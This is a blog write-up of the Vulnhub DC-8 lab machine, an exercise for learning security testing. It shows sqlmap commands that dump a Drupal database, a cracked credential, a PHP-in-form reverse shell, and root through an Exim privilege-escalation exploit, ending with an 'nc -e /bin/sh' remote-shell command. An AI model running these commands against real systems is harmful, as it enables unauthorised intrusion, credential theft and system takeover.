mzfr@home:~$

HTB

Vulnhub

CTF

About

Donate

Vulnhub - DC-8 writeup


DC-8

Author: DCAU7

Nmap

only two ports are open. A SSH service and a HTTP service with a robots.txt file present.

HTTP

There was something odd. The links on the left side resulted in IP/?nid=2 type of URL but links with same name on the header caused in URLs of type IP/node/2. So I Checked the ?nid= type URLs for LFI and got some SQL related error.

And since it’s related to SQL I decided to run SQLmap on it.

Sqlmap found nid to be vulnerable and using that I got 2 DB in output.

➜ sqlmap -u http://192.168.56.122/\?nid\= --level 4 --dbs

I used the d7db DB to dump all the tables in it. In output I got 88 tables.

➜ sqlmap -u http://192.168.56.122/\?nid\= --level 4 -D d7db --tables

The first table I dumped was users in which I found 3 users along with their password hash.

➜ sqlmap -u http://192.168.56.122/\?nid\= --level 4 -D d7db -T users --dump

I saved those hashes to a file and ran John on it.

john:turtle

So Now we have credential which we can use to login in Drupal. The login page can be found on /user/login/

After spending lot of time I figure out that we need to edit the form-setting and change the text format to php code.

And then we can submit the form which will trigger the reverse shell.

NOTE: Make sure to have some random text above your PHP code. If you have only php code in that(Submission setting) section then submitting the form won’t trigger any thing. Thanks to @DCAU7 for pointing that out.

If you did everything right then after submitting a random Contact us form info you’ll get the reverse shell.

Privilege escalation

I ran the enumeration script but didn’t find anything good. I tried looking for everything like sudo right or SUIDs but I found nothing.

After sometime @DCAU7 and @theart42 told me that we have to exploit exim4 binary.

We can see exim4 is set as SUID

To see the exact version of exim4 we can use dpkg -l

Since the version is 4.89 we can use Exim 4.87 - 4.91 - Local Privilege Escalation.

Download the exploit and run it as bash exploit.sh -m netcat and the moment you get the message saying localhost is opened run command like nc -e /bin/sh IP PORT to get the root shell.

After running that nc command I got root shell on my nc listener.

Now get the root flag

This was an awesome machine. The method to get the reverse shell was amazing, because even though in drupal 8 the PHP code exec thing is removed from core we still were able to run that kind of code, that is because of giving editing access john had.

Also the root part kinda new too me because I never exploited exim4 before even if it was marked as SUID, but as @theart42 said Version of the binary also matters.

Thanks to @DCAU7 for this awesome addition to the awesome series.Also thanks to @theart42.

Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more “Writeups”. And if you’d like to support me considering donating 😄